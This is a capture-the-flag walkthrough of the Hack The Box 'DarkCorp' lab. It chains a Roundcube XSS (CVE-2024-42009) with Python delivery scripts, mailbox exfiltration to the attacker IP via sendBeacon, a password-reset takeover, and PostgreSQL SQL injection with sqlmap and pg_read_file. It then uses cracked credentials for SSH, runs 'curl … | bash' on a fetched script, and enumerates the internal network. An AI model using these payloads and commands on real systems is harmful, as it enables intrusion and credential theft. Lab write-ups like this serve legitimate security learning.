DarkCorp

Recon

nmap_scan.log

HTTP (80)

Writeup.png

RoundCube

On /register we can sign up, and on mail.drip.htb we can login into RoundCube mail

Creds: test02:test02

Writeup-1.png

RoundCube version is 1.6.7

Writeup-2.png

Government Emails at Risk: Critical Cross-Site Scripting Vulnerability in Roundcube Webmail

Unintended Sidetrack

You could register as almost any user, if we use root we can login and see cronjob reports sent to root...

Writeup-4.png

drip.darkcorp.htb redirects to drip.htb

There's 2 users: ebelford and support

Passive recon reveals that domain is serving some application

└─$ feroxbuster -u 'http://drip.darkcorp.htb/' -w /usr/share/seclists/Discovery/Web-Content/common.txt --thorough -D -C 404,403,400 -S 0,34
200      GET        1l        5w       64c http://drip.darkcorp.htb/
301      GET        7l       11w      169c http://drip.darkcorp.htb/dashboard => http://drip.darkcorp.htb/dashboard/
200      GET        1l        5w       64c http://drip.darkcorp.htb/index.html
301      GET        7l       11w      169c http://drip.darkcorp.htb/dashboard/apps => http://drip.darkcorp.htb/dashboard/apps/
301      GET        7l       11w      169c http://drip.darkcorp.htb/dashboard/media => http://drip.darkcorp.htb/dashboard/media/
301      GET        7l       11w      169c http://drip.darkcorp.htb/dashboard/apps/authentication => http://drip.darkcorp.htb/dashboard/apps/authentication/
301      GET        7l       11w      169c http://drip.darkcorp.htb/dashboard/apps/home => http://drip.darkcorp.htb/dashboard/apps/home/
301      GET        7l       11w      169c http://drip.darkcorp.htb/dashboard/apps/static => http://drip.darkcorp.htb/dashboard/apps/static/
301      GET        7l       11w      169c http://drip.darkcorp.htb/dashboard/apps/templates => http://drip.darkcorp.htb/dashboard/apps/templates/
301      GET        7l       11w      169c http://drip.darkcorp.htb/dashboard/apps/templates/accounts => http://drip.darkcorp.htb/dashboard/apps/templates/accounts/
301      GET        7l       11w      169c http://drip.darkcorp.htb/dashboard/apps/static/assets => http://drip.darkcorp.htb/dashboard/apps/static/assets/
301      GET        7l       11w      169c http://drip.darkcorp.htb/dashboard/apps/templates/home => http://drip.darkcorp.htb/dashboard/apps/templates/home/
301      GET        7l       11w      169c http://drip.darkcorp.htb/dashboard/apps/templates/includes => http://drip.darkcorp.htb/dashboard/apps/templates/includes/
301      GET        7l       11w      169c http://drip.darkcorp.htb/dashboard/apps/templates/layouts => http://drip.darkcorp.htb/dashboard/apps/templates/layouts/
[####################] - 3m     73512/73512   0s      found:14      errors:0
[####################] - 12s     7256/7256    621/s   http://drip.darkcorp.htb/
[####################] - 2m      9411/9411    70/s    http://drip.darkcorp.htb/dashboard/
[####################] - 78s     4733/4733    61/s    http://drip.darkcorp.htb/dashboard/apps/
[####################] - 78s     4733/4733    61/s    http://drip.darkcorp.htb/dashboard/media/
[####################] - 85s     4733/4733    56/s    http://drip.darkcorp.htb/dashboard/apps/authentication/
[####################] - 86s     4733/4733    55/s    http://drip.darkcorp.htb/dashboard/apps/home/
[####################] - 82s     4733/4733    58/s    http://drip.darkcorp.htb/dashboard/apps/static/
[####################] - 85s     4733/4733    56/s    http://drip.darkcorp.htb/dashboard/apps/templates/ 

└─$ feroxbuster -u 'http://drip.darkcorp.htb/dashboard' -w /usr/share/seclists/Discovery/Web-Content/quickhits.txt --thorough -n -D -C 404,403,400 -S 0,34
301      GET        7l       11w      169c http://drip.darkcorp.htb/dashboard => http://drip.darkcorp.htb/dashboard/
200      GET       32l       86w      796c http://drip.darkcorp.htb/dashboard/.env
[####################] - 8s      2635/2635    0s      found:2       errors:2
[####################] - 7s      2623/2623    373/s   http://drip.darkcorp.htb/dashboard/ 

You could read http://drip.darkcorp.htb/dashboard/.env and any other source file you could find.

Probably unintended so didn't follow the path.

XSS - CVE-2024-42009

While testing for CVE-2024-42009 I messed up recipient and got email about user not existing, potential user enumeration if support fails?

Writeup-3.png

Hmmm... playing around with XSS yielded nothing using payload from blog.

From the main page /contact is sending emails to specified recipient

Writeup-5.png

Test if we can receive it and yes:

Writeup-6.png

I used following script to test many payloads, but none worked.

from os import urandom
import requests
from bs4 import BeautifulSoup as BS

URL = 'http://mail.drip.htb/'  
USERNAME, PASSWORD = "test02", "test02"
SENDER = f"{USERNAME}@drip.htb"
recipient = 'test02@drip.htb'  
subject = 'Your Email Subject'


def login(session, username, password):
    resp = session.get(URL, params={'_task': 'login'})
    token = BS(resp.text, 'html.parser').find('input', {'name': '_token'})
    if not token:
        raise Exception('Unable to find CSRF token on the login page.')

    payload = {
        '_token': token['value'],
        '_task': 'login',
        '_action': 'login',
        '_user': username,
        '_pass': password
    }
    login_response = session.post(URL, data=payload)

    if 'login' in login_response.url:
        raise Exception('Login failed. Please check your credentials.')


def send_email(session, sender, recipient, subject, message):
    resp = session.get(URL, params={'_task': 'mail', '_action': 'compose'})
    html = BS(resp.text, 'html.parser')
    token = html.find('input', {'name': '_token'})
    id_ = html.find('input', {'name': '_id'})
    if not token or not id_:
        raise Exception('Unable to find CSRF token or compose ID on the compose page.')

    send_data = {
        '_token': token['value'],
        '_task': 'mail',
        '_action': 'send',
        '_id': id_['value'],
        '_from': sender,
        '_to': recipient,
        '_cc': sender,
        '_subject': subject,
        '_is_html': 1,
        '_framed': 1,
        'editorSelector': 'html',
        '_message': message
    }
    send_response = session.post(URL, data=send_data)

    if 'message sent' in send_response.text.lower():
        print('Email sent successfully.')
    else:
        raise Exception('Failed to send the email.')


recipient = f"{USERNAME}@drip.htb"
recipient = f"bcase@drip.htb"
subject = urandom(8).hex()
message = """
<body title="bgcolor=foo" name="bar onload=alert(origin)">
\xC2\xA0Foo
</body>
"""
 
with requests.Session() as session:
    session.proxies = {'http': 'http://127.0.0.1:8080'}

    login(session, USERNAME, PASSWORD)

    send_email(session, SENDER, recipient, subject, message)

Going back to contact form it has field content=text, if switched to html then this XSS works.... ???

If we send to non existent email then it ends up in our mailbox (email field (?)) as failed send, here we get self XSS because it failed but confirms that XSS works from /contact

Writeup-7.png

support user does not generate callback, but bcase user does.

└─$ ncat -lvnkp 80
Ncat: Connection from 10.129.40.174:49956.
GET / HTTP/1.1
Host: 10.10.14.20
Connection: keep-alive
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/131.0.0.0 Safari/537.36
Accept: */*
Origin: http://mail.drip.htb
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

Script:

from base64 import b64encode
from time import sleep
import requests

URL = 'http://drip.htb/contact'

payload = '''
const C2 = "http://10.10.14.20"
fetch("/?_task=mail&_action=list&_remote=1")
.then(resp => resp.text())
.then(resp => navigator.sendBeacon(C2, resp))
'''
data = {
    'name': 'test02',
    'email': 'test02@drip.htb',
    'message': """<body title="bgcolor=foo" name="bar style=animation-name:progress-bar-stripes onanimationstart=eval(atob(`%s`)) foo=bar">Foo</body>""" % b64encode(payload.encode()).decode(),
    'content': 'html',
    'recipient': 'bcase@drip.htb',
}

requests.post(URL, data=data)

this.add_message_row(3,{"subject":"Customer Information Request","fromto":"<span class=\\"adr\\"><span title=\\"test02@drip.htb\\" class=\\"rcmContactAddress\\">test02<\/span><\/span>","date":"Today 16:00","size":"2 KB"},{"seen":1,"ctype":"multipart\/mixed","mbox":"INBOX"},false);
this.add_message_row(2,{"subject":"Analytics Dashboard","fromto":"<span class=\\"adr\\"><span title=\\"ebelford@drip.htb\\" class=\\"rcmContactAddress\\">ebelford<\/span><\/span>","date":"2024-12-24 13:38","size":"1 KB"},{"seen":1,"ctype":"text\/plain","mbox":"INBOX"},false);
this.add_message_row(1,{"subject":"Welcome to DripMail","fromto":"<span class=\\"adr\\"><span title=\\"no-reply@drip.htb\\" class=\\"rcmContactAddress\\">no-reply@drip.htb<\/span><\/span>","date":"2024-12-20 12:43","size":"687 B"},{"seen":1,"ctype":"","mbox":"INBOX"},false);

This user has 2 mails and then ours. Welcome email can be discarded. Analytics Dashboard is interesting from ebelford@drip.htb.

Read the email using preview action: fetch("/?_task=mail&_uid=2&_mbox=INBOX&_framed=1&_action=preview")

UID can be found in list action json

Writeup-8.png

More XSS - Forgot Password

http://dev-a3f1-01.drip.htb/

Writeup-9.png

We can't login, only bcase can. There's Forgot Password on platform which requires email.

Writeup-10.png

Send and list emails again

this.add_message_row(3,{\"subject\":\"Reset token\",\"fromto\":\"<span class=\\\"adr\\\"><span title=\\\"no-reply@drip.htb\\\" class=\\\"rcmContactAddress\\\">no-reply@drip.htb</span></span>\",\"date\":\"Today 17:00\",\"size\":\"928 B\"},{\"seen\":1,\"ctype\":\"text/plain\",\"mbox\":\"INBOX\"},false)

Read the email

Writeup-11.png

http://dev-a3f1-01.drip.htb/reset/ImJjYXNlQGRyaXAuaHRiIg.Z6fxAA.W9dAyVvWlL82g0CDFyPAK832d98

Creds: bcase:Password123$

SQLi (Postgres)

Writeup-12.png

Searching for test crashed the app (?)

Writeup-13.png

Looks like we have to do SQLi. Psycopg is the most popular PostgreSQL database adapter for the Python programming language. PayloadsAllTheThings/SQL Injection/PostgreSQL Injection

1 OR 1=1 -- -   # Fail
'1' OR 1=1 -- - # Success

Get tables (using default database)

└─$ sqlmap -u 'http://dev-a3f1-01.drip.htb/analytics' -H 'Cookie: session=.eJwljjFuAzEMBP-iOoVIkRTlzxwokYSNAAlwZ1dB_m4FwVY7zcxPOfKM615uz_MVH-V4eLkV7SFAskyXsDSYMPrijF6JkoP7Jg18YLIlBJPnRLCpronLqCpB1wbNAVVT16KZJOSzAYdNcekDzMQVo7qwIiYwU9IUaKPskNcV538N7LuuM4_n92d8_YGovBwtGKNTJ9irO602ixFt-1uGVSu_b5l3Pmw.Z6fzTg.fjMYjdvG9HlCiV0nO63Rmg9l2xQ' --data "query='*'" --threads=10 --dbms=Postgres --technique=BUE --batch --tables
Database: public
[1 table]
+--------------------------+
| pg_subscription          |
+--------------------------+

Database: pg_catalog
[22 tables]
+--------------------------+
| pg_am                    |
| pg_amop                  |
| pg_amproc                |
| pg_attrdef               |
| pg_authid                |
| pg_catalog               |
| pg_class                 |
| pg_constraint            |
| pg_database              |
| pg_foreign_server        |
| pg_index                 |
| pg_largeobject_metadata  |
| pg_opclass               |
| pg_operator              |
| pg_opfamily              |
| pg_parameter_acl         |
| pg_range                 |
| pg_statistic             |
| pg_statistic_ext_data    |
| pg_subscription          |
| pg_ts_parser             |
| pg_user_mapping          |
+--------------------------+

Database: pg_am
[2 tables]
+--------------------------+
| pg_amproc                |
| pg_statistic_ext         |
+--------------------------+

Database: pg_amproc
[4 tables]
+--------------------------+
| pg_cast                  |
| pg_catalog               |
| pg_conversion            |
| pg_depend                |
+--------------------------+

Database: pg_cast
[3 tables]
+--------------------------+
| pg_cast                  |
| pg_database              |
| pg_tablespace            |
+--------------------------+

Database: pg_database
[4 tables]
+--------------------------+
| pg_catalog               |
| pg_ts_config             |
| pg_ts_config_map         |
| pg_ts_dict               |
+--------------------------+

Database: pg_tablespace
[1 table]
+--------------------------+
| pg_ts_config_map         |
+--------------------------+

Database: pg_range
[2 tables]
+--------------------------+
| pg_publication_namespace |
| pg_publication_rel       |
+--------------------------+

Database: information_schema
[2 tables]
+--------------------------+
| pg_publication_rel       |
| sql_sizing               |
+--------------------------+

List databases since default is empty

└─$ sqlmap -u 'http://dev-a3f1-01.drip.htb/analytics' -H 'Cookie: session=.eJwljjFuAzEMBP-iOoVIkRTlzxwokYSNAAlwZ1dB_m4FwVY7zcxPOfKM615uz_MVH-V4eLkV7SFAskyXsDSYMPrijF6JkoP7Jg18YLIlBJPnRLCpronLqCpB1wbNAVVT16KZJOSzAYdNcekDzMQVo7qwIiYwU9IUaKPskNcV538N7LuuM4_n92d8_YGovBwtGKNTJ9irO602ixFt-1uGVSu_b5l3Pmw.Z6fzTg.fjMYjdvG9HlCiV0nO63Rmg9l2xQ' --data "query='*'" --threads=10 --dbms=Postgres --technique=BUE --batch --dbs
available databases [3]:
[*] information_schema
[*] pg_catalog
[*] public

List public database

└─$ sqlmap -u 'http://dev-a3f1-01.drip.htb/analytics' -H 'Cookie: session=.eJwljjFuAzEMBP-iOoVIkRTlzxwokYSNAAlwZ1dB_m4FwVY7zcxPOfKM615uz_MVH-V4eLkV7SFAskyXsDSYMPrijF6JkoP7Jg18YLIlBJPnRLCpronLqCpB1wbNAVVT16KZJOSzAYdNcekDzMQVo7qwIiYwU9IUaKPskNcV538N7LuuM4_n92d8_YGovBwtGKNTJ9irO602ixFt-1uGVSu_b5l3Pmw.Z6fzTg.fjMYjdvG9HlCiV0nO63Rmg9l2xQ' --data "query='*'" --threads=10 --dbms=Postgres --technique=BUE --batch -D public --tables
Database: public
[2 tables]
+--------+
| Admins |
| Users  |
+--------+

Database doesn't return anything...

└─$ sqlmap -u 'http://dev-a3f1-01.drip.htb/analytics' -H 'Cookie: session=.eJwljjFuAzEMBP-iOoVIkRTlzxwokYSNAAlwZ1dB_m4FwVY7zcxPOfKM615uz_MVH-V4eLkV7SFAskyXsDSYMPrijF6JkoP7Jg18YLIlBJPnRLCpronLqCpB1wbNAVVT16KZJOSzAYdNcekDzMQVo7qwIiYwU9IUaKPskNcV538N7LuuM4_n92d8_YGovBwtGKNTJ9irO602ixFt-1uGVSu_b5l3Pmw.Z6fzTg.fjMYjdvG9HlCiV0nO63Rmg9l2xQ' --data "query='*'" --threads=10 --dbms=Postgres --technique=BUE --batch -D public --dump --no-cast
[*] starting @ 19:29:36 /2025-02-08/

custom injection marker ('*') found in POST body. Do you want to process it? [Y/n/q] Y
[19:29:37] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
    Type: error-based
    Title: PostgreSQL AND error-based - WHERE or HAVING clause
    Payload: query='' AND 9033=CAST((CHR(113)||CHR(112)||CHR(106)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (9033=9033) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(107)||CHR(120)||CHR(112)||CHR(113)) AS NUMERIC) AND 'SMUP'='SMUP'
---
[19:29:38] [INFO] testing PostgreSQL
[19:29:38] [INFO] confirming PostgreSQL
[19:29:38] [INFO] the back-end DBMS is PostgreSQL
web application technology: Nginx 1.22.1
back-end DBMS: PostgreSQL
[19:29:38] [INFO] fetching tables for database: 'public'
[19:29:38] [INFO] starting 2 threads
[19:29:38] [INFO] resumed: 'Users'
[19:29:38] [INFO] resumed: 'Admins'
[19:29:38] [INFO] fetching columns for table 'Admins' in database 'public'
[19:29:38] [INFO] starting 4 threads
[19:29:38] [INFO] resumed: 'id'
[19:29:38] [INFO] resumed: 'password'
[19:29:38] [INFO] resumed: 'email'
[19:29:38] [INFO] resumed: 'varchar'
[19:29:38] [INFO] resumed: 'varchar'
[19:29:38] [INFO] resumed: 'int4'
[19:29:38] [INFO] resumed: 'username'
[19:29:38] [INFO] resumed: 'varchar'
[19:29:38] [INFO] fetching entries for table 'Admins' in database 'public'
you provided a HTTP Cookie header value, while target URL provides its own cookies within HTTP Set-Cookie header which intersect with yours. Do you want to merge them in further requests? [Y/n] Y
got a 302 redirect to 'http://dev-a3f1-01.drip.htb/analytics'. Do you want to follow? [Y/n] Y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [y/N] N
[19:29:39] [WARNING] reflective value(s) found and filtering out
[19:29:39] [WARNING] the SQL query provided does not return any output
[19:29:39] [WARNING] unable to retrieve the entries for table 'Admins' in database 'public'
[19:29:39] [INFO] fetching columns for table 'Users' in database 'public'
[19:29:39] [INFO] starting 6 threads
[19:29:39] [INFO] resumed: 'email'
[19:29:39] [INFO] resumed: 'password'
[19:29:39] [INFO] resumed: 'host_header'
[19:29:39] [INFO] resumed: 'id'
[19:29:39] [INFO] resumed: 'ip_address'
[19:29:39] [INFO] resumed: 'varchar'
[19:29:39] [INFO] resumed: 'username'
[19:29:39] [INFO] resumed: 'varchar'
[19:29:39] [INFO] resumed: 'varchar'
[19:29:39] [INFO] resumed: 'password'
[19:29:39] [INFO] resumed: 'password'
[19:29:39] [INFO] resumed: 'password'
[19:29:39] [INFO] fetching entries for table 'Users' in database 'public'
[19:29:40] [WARNING] the SQL query provided does not return any output
[19:29:40] [WARNING] unable to retrieve the entries for table 'Users' in database 'public'
[19:29:40] [INFO] fetched data logged to text files under '/home/woyag/.local/share/sqlmap/output/dev-a3f1-01.drip.htb'

[*] ending @ 19:29:40 /2025-02-08/

SQLi -> LFI

Postgres allows writing and reading files.

└─$ sqlmap -u 'http://dev-a3f1-01.drip.htb/analytics' -H 'Cookie: session=.eJwljjFuAzEMBP-iOoVIkRTlzxwokYSNAAlwZ1dB_m4FwVY7zcxPOfKM615uz_MVH-V4eLkV7SFAskyXsDSYMPrijF6JkoP7Jg18YLIlBJPnRLCpronLqCpB1wbNAVVT16KZJOSzAYdNcekDzMQVo7qwIiYwU9IUaKPskNcV538N7LuuM4_n92d8_YGovBwtGKNTJ9irO602ixFt-1uGVSu_b5l3Pmw.Z6fzTg.fjMYjdvG9HlCiV0nO63Rmg9l2xQ' --data "query='*'" --threads=10 --dbms=Postgres --technique=E --batch --sql-shell --hex
sql-shell> select pg_read_file('/etc/passwd', 0, 2000);
...
root:x:0:0:root:/root:/bin/bash
sync:x:4:65534:sync:/bin:/bin/sync
bcase:x:1000:1000:Bryce Case Jr.,,,:/home/bcase:/bin/bash
postgres:x:102:110:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
ebelford:x:1002:1002:Eugene Belford:/home/ebelford:/bin/bash
...

Hmmmm... even if we could write files we can't do anything with it.

/etc/hosts

127.0.0.1 localhost drip.htb mail.drip.htb dev-a3f1-01.drip.htb

# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

172.16.20.1 DC-01 DC-01.darkcorp.htb darkcorp.htb
172.16.20.3 drip.darkcorp.htb

There are other hosts on network, I kind of forgot this was a Windows machine.

Read files:

import re
from requests import Session
from bs4 import BeautifulSoup as BS
import readline
from flask_unsign import decode

URL = 'http://dev-a3f1-01.drip.htb'
USERNAME, PASSWORD = 'bcase', 'Password123$' 

with Session() as session:
    csrf_token = BS(session.get(f'{URL}/login').text, 'html.parser').find('input', {'id':'csrf_token'})['value']
    session.post(f'{URL}/login', data={'csrf_token': csrf_token, 'username': USERNAME, 'password': PASSWORD, 'login': ''})

    while True:
        file = input('File To Read: ')
        resp = session.post(f'{URL}/analytics', data={'query': f"'' AND (SELECT pg_read_file('{file}'))::int=1 -- -"}, allow_redirects=False)
        result = re.search('"(.*?)"', decode(resp.cookies.get('session'))['_flashes'][-1][-1], re.DOTALL).group(1).strip()
        print(result)
        print('- ' * 32)

Nothing so far with LFI...

Logs seems interesting - https://hacktricks.boitatech.com.br/pentesting/pentesting-postgresql

https://learnomate.org/documentation-of-postgresql-conf-file/

The location of the postgresql.conf file can vary depending on the operating system and the installation method. Common locations include:

• /etc/postgresql/<version>/main/postgresql.conf (Debian/Ubuntu)

• /var/lib/pgsql/<version>/data/postgresql.conf (CentOS/Red Hat)

• /usr/local/pgsql/data/postgresql.conf (custom source installations)

To leak the version use '' AND (SELECT version())::int=1 -- -

Writeup-14.png

When I attempt to read /etc/postgresql/15/main/postgresql.conf then application crashes with 502... SQLMap payload was successful at reading the file, but only managed to read up to 5500 bytes (not enough for log config).

Default location for version 15 seems to be /var/log/postgresql/postgresql-15-main.log

sql-shell> SELECT pg_read_file('/var/log/postgresql/postgresql-15-main.log', 0, 10000)
[21:56:00] [INFO] fetching SQL SELECT statement query output: 'SELECT pg_read_file('/var/log/postgresql/postgresql-15-main.log', 0, 10000)'
...
2025-02-03 11:05:04.886 MST [5952] postgres@dripmail ERROR:  trailing junk after numeric literal at or near "8bbd7f88841b4223ae63c8848969be86" at character 29
2025-02-03 11:05:04.886 MST [5952] postgres@dripmail STATEMENT:  UPDATE Users SET password = 8bbd7f88841b4223ae63c8848969be86 WHERE username = ebelford;
...

https://crackstation.net -> 8bbd7f88841b4223ae63c8848969be86 -> ThePlague61780

SSH (22)

Creds: ebelford:ThePlague61780

└─$ sshpass -p 'ThePlague61780' ssh ebelford@drip.htb
You have no mail.
Last login: Wed Feb  5 16:40:19 2025 from 172.16.20.1
ebelford@drip:~$ id
uid=1002(ebelford) gid=1002(ebelford) groups=1002(ebelford)
ebelford@drip:~$ ls -alh
total 8.0K
drwxr-xr-x 2 ebelford ebelford 4.0K Feb  5 12:49 .
drwxr-xr-x 5 root     root     4.0K Feb  3 10:46 ..
lrwxrwxrwx 1 root     root        9 Feb  3 10:47 .bash_history -> /dev/null

Postgres

ebelford@drip:/var/www/html/dashboard$ cat .env
# True for development, False for production
DEBUG=False

# Flask ENV
FLASK_APP=run.py
FLASK_ENV=development

# If not provided, a random one is generated
# SECRET_KEY=<YOUR_SUPER_KEY_HERE>

# Used for CDN (in production)
# No Slash at the end
ASSETS_ROOT=/static/assets

# If DB credentials (if NOT provided, or wrong values SQLite is used)
DB_ENGINE=postgresql
DB_HOST=localhost
DB_NAME=dripmail
DB_USERNAME=dripmail_dba
DB_PASS=2Qa2SsBkQvsc
DB_PORT=5432

SQLALCHEMY_DATABASE_URI = 'postgresql://dripmail_dba:2Qa2SsBkQvsc@localhost/dripmail'
SQLALCHEMY_TRACK_MODIFICATIONS = True
SECRET_KEY = 'GCqtvsJtexx5B7xHNVxVj0y2X0m10jq'
MAIL_SERVER = 'drip.htb'
MAIL_PORT = 25
MAIL_USE_TLS = False
MAIL_USE_SSL = False
MAIL_USERNAME = None
MAIL_PASSWORD = None
MAIL_DEFAULT_SENDER = 'support@drip.htb'

Enumerate Postgres

ebelford@drip:/tmp$ PGPASSWORD='2Qa2SsBkQvsc' psql -U dripmail_dba -h localhost -p 5432 -d dripmail -c 'SELECT username,password FROM "Users";'
 username |             password
----------+----------------------------------
 support  | d9b9ecbf29db8054b21f303072b37c4e
 bcase    | 1eace53df87b9a15a37fdc11da2d298d
 ebelford | 0cebd84e066fd988e89083879e88c5f9

ebelford@drip:/tmp$ PGPASSWORD='2Qa2SsBkQvsc' psql -U dripmail_dba -h localhost -p 5432 -d dripmail -c 'SELECT username,password FROM "Admins";'
 username |             password
----------+----------------------------------
 bcase    | dc5484871bc95c4eab58032884be7225

No hash is found in CrackStation database...

Network Enumeration~

We just got entrypoint into the network and if you remember there was 2 other hosts, from /etc/hosts. We can get nmap and start scanning them.

ebelford@drip:/tmp$ ip -brief address show
lo               UNKNOWN        127.0.0.1/8
eth0             UP             172.16.20.3/24

There's only these 3 devices on network.

└─$ curl -LOs https://github.com/andrew-d/static-binaries/raw/refs/heads/master/binaries/linux/x86_64/nmap
└─$ sshpass -p 'ThePlague61780' scp ./nmap ebelford@drip.htb:/tmp/nmap
ebelford@drip:/var/www/html$ chmod +x /tmp/nmap
ebelford@drip:/var/www/html$ touch nmap-services
ebelford@drip:/var/www/html$ /tmp/nmap -sn 172.16.20.0/24
Nmap scan report for DC-01 (172.16.20.1) # DC01
Host is up (0.0012s latency).
Nmap scan report for 172.16.20.2 # Unknown
Host is up (0.0018s latency).
Nmap scan report for drip.darkcorp.htb (172.16.20.3) # We are 3!
Host is up (0.00017s latency).
Nmap done: 256 IP addresses (3 hosts up) scanned in 3.41 seconds

ebelford@drip:/tmp$ ./nmap -Pn -p- -T5 --min-rate=1000 --open 172.16.20.1

Starting Nmap 6.49BETA1 ( http://nmap.org ) at 2025-02-08 21:08 MST
Cannot find nmap-payloads. UDP payloads are disabled.
channel 2: open failed: connect failed: Temporary failure in name resolution
Nmap scan report for DC-01 (172.16.20.1)
Host is up (0.0035s latency).
Not shown: 65506 filtered ports
PORT      STATE SERVICE
22/tcp    open  unknown
53/tcp    open  unknown
80/tcp    open  unknown
88/tcp    open  unknown
135/tcp   open  unknown
139/tcp   open  unknown
389/tcp   open  unknown
443/tcp   open  unknown
445/tcp   open  unknown
464/tcp   open  unknown
593/tcp   open  unknown
636/tcp   open  unknown
2179/tcp  open  unknown
3268/tcp  open  unknown
3269/tcp  open  unknown
5985/tcp  open  unknown
9389/tcp  open  unknown
47001/tcp open  unknown
49384/tcp open  unknown
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49668/tcp open  unknown
49678/tcp open  unknown
53491/tcp open  unknown
55569/tcp open  unknown
55579/tcp open  unknown
55596/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 52.45 seconds
ebelford@drip:/tmp$ ./nmap -Pn -p- -T5 --min-rate=1000 --open 172.16.20.2

Starting Nmap 6.49BETA1 ( http://nmap.org ) at 2025-02-08 21:09 MST
Cannot find nmap-payloads. UDP payloads are disabled.
Warning: 172.16.20.2 giving up on port because retransmission cap hit (2).
Nmap scan report for 172.16.20.2
Host is up (0.0033s latency).
Not shown: 65453 closed ports, 67 filtered ports
PORT      STATE SERVICE
80/tcp    open  unknown
135/tcp   open  unknown
139/tcp   open  unknown
445/tcp   open  unknown
5000/tcp  open  unknown
5985/tcp  open  unknown
47001/tcp open  unknown
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49668/tcp open  unknown
49669/tcp open  unknown
49670/tcp open  unknown
49671/tcp open  unknown

Just in case we might have missed something enumerate with linpeas:

ebelford@drip:/tmp$ curl 10.10.14.20/lp.sh|bash|tee /tmp/lp.log
...
╔══════════╣ Hostname, hosts and DNS
drip
127.0.0.1       localhost drip.htb mail.drip.htb dev-a3f1-01.drip.htb

::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

172.16.20.1 DC-01 DC-01.darkcorp.htb darkcorp.htb
172.16.20.3 drip.darkcorp.htb
nameserver 172.16.20.1

search darkcorp.htb
darkcorp.htb
╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports
tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:587           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:143           0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:46775         0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:33549         0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:5432          0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:8001          0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:8000          0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:993           0.0.0.0:*               LISTEN      -
tcp6       0      0 :::80                   :::*                    LISTEN      -
tcp6       0      0 :::22                   :::*                    LISTEN      -
╔══════════╣ Users with console
bcase:x:1000:1000:Bryce Case Jr.,,,:/home/bcase:/bin/bash
ebelford:x:1002:1002:Eugene Belford:/home/ebelford:/bin/bash
postgres:x:102:110:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
root:x:0:0:root:/root:/bin/bash
╔══════════╣ Useful software
/usr/bin/base64
/usr/bin/curl
/usr/bin/g++
/usr/bin/gcc
/usr/bin/make
/usr/bin/nc
/usr/bin/nc.traditional
/usr/bin/netcat
/usr/bin/perl
/usr/bin/php
/usr/bin/ping
/usr/bin/python3
/usr/bin/sudo
/usr/bin/wget
╔══════════╣ Searching kerberos conf files and tickets
╚ http://book.hacktricks.xyz/linux-hardening/privilege-escalation/linux-active-directory
kadmin was found on /usr/bin/kadmin
kadmin was found on /usr/bin/kinit
klist execution
klist: No credentials cache found (filename: /tmp/krb5cc_1002)
ptrace protection is disabled (0), you might find tickets inside processes memory
-rw-r--r-- 1 root root 249 Feb  8 17:42 /etc/krb5.conf
[libdefaults]
        default_realm = DARKCORP.HTB
        dns_lookup_realm = true
        dns_lookup_kdc = true

[realms]
        DARKCORP.HTB = {
                kdc = darkcorp.htb
                admin_server = darkcorp.htb
        }

[domain_realm]
        .darkcorp.htb = DARKCORP.HTB
        darkcorp.htb = DARKCORP.HTB
-rw-r--r-- 1 root root 169 Apr 11  2023 /usr/lib/x86_64-linux-gnu/sssd/conf/sssd.conf
[sssd]
domains = shadowutils

[nss]

[pam]

[domain/shadowutils]
id_provider = files

auth_provider = proxy
proxy_pam_target = sssd-shadowutils

proxy_fast_alias = True
tickets kerberos Not Found
klist Not Found

Back to scanning, .1 and .2 are both Windows machines (denoted by TTL=128) and we are on Linux (denoted by TTL=64)

ebelford@drip:/tmp$ ping -c 1 172.16.20.2
64 bytes from 172.16.20.2: icmp_seq=1 ttl=128 time=0.742 ms
ebelford@drip:/tmp$ ping -c 1 172.16.20.1
64 bytes from 172.16.20.1: icmp_seq=1 ttl=128 time=0.810 ms
ebelford@drip:/tmp$ ping -c 1 172.16.20.3
64 bytes from 172.16.20.3: icmp_seq=1 ttl=64 time=0.029 ms

SMB Enum~

Port forward and try tinkering with Windows

└─$ sshpass -p 'ThePlague61780' ssh ebelford@drip.htb -D 127.0.0.1:1080

└─$ proxychains -q netexec smb 172.16.20.2 -u '' -p ''
SMB         172.16.20.2     445    WEB-01           [*] Windows Server 2022 Build 20348 x64 (name:WEB-01) (domain:darkcorp.htb) (signing:False) (SMBv1:False)
SMB         172.16.20.2     445    WEB-01           [-] darkcorp.htb\: STATUS_ACCESS_DENIED

└─$ proxychains -q netexec smb 172.16.20.2 -u 'guest' -p ''
SMB         172.16.20.2     445    WEB-01           [*] Windows Server 2022 Build 20348 x64 (name:WEB-01) (domain:darkcorp.htb) (signing:False) (SMBv1:False)
SMB         172.16.20.2     445    WEB-01           [-] darkcorp.htb\guest: STATUS_ACCOUNT_DISABLED

└─$ proxychains -q netexec smb 172.16.20.2 -u 'pleaseletmein' -p ''
